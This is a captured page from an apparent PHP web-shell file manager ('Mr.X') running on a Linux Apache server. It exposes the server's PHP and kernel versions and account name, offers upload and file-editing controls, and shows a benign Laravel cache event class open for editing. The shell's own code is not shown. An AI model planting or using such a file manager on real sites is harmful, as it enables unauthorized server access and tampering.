🤩 File Manager - Mr.X
PHP:
8.3.33
Server:
Apache
OS:
Linux 5.14.0-611.49.1.el9_7.x86_64
User:
websparkit
Navigate
Upload:
Upload
New File
New Folder
Editing:CacheFailedOver.php
<?php namespace Illuminate\Cache\Events; use Throwable; class CacheFailedOver { /** * Create a new event instance. * * @param string|null $storeName The name of the cache store that failed. * @param \Throwable $exception The exception that was thrown. */ public function __construct( public ?string $storeName, public Throwable $exception, ) { } }
Save Changes
Cancel
Create New File
Create New Folder